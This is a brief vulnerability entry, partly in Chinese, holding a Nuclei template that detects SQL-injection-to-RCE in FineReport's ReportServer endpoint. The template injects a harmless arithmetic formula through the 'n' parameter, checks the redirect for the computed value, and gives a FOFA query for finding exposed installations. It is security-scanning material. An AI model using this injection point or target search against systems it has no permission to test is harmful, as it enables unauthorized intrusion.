漏洞描述
Access URL:/webroot/decision/view/ReportServer?test=&n=, which can execute the SQL statement in GET parameter n. This vulnerability is caused by Fanruan's own sqlite-jdbc-x.x.x.x.jar driver.
finereport-sqli-rce: FineReport SQLi - Remote Code Execution
PoC代码[已公开]
id: finereport-sqli-rce
info:
name: FineReport SQLi - Remote Code Execution
author: adeljck
severity: critical
description: |
Access URL:/webroot/decision/view/ReportServer?test=&n=, which can execute the SQL statement in GET parameter n. This vulnerability is caused by Fanruan's own sqlite-jdbc-x.x.x.x.jar driver.
reference:
- https://github.com/wy876/POC/blob/main/%E5%B8%86%E8%BD%AF%E7%B3%BB%E7%BB%9FReportServer%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AF%BC%E8%87%B4RCE.md
metadata:
max-request: 1
verified: true
fofa-query: app="帆软-FineReport"
tags: finereport,rce,sqli,vuln
variables:
string: '{{rand_base(8, "abc")}}'
http:
- raw:
- |
GET /webroot/decision/view/ReportServer?{{string}}=&n=${sum(1024,123)} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: location
words:
- 'report?{{string}}&n=1147'
- type: status
status:
- 200
- 302
# digest: 4a0a00473045022013dbf8f79338275175048d93ef7f04ec0241a28db29709b5f1aa241375632fb60221009edd8dd21a336cf7ae3d7a45ca7acbb502f924090cd53c8b28e32c9c105d12e6:922c64590222798bb761d5b6d8e72950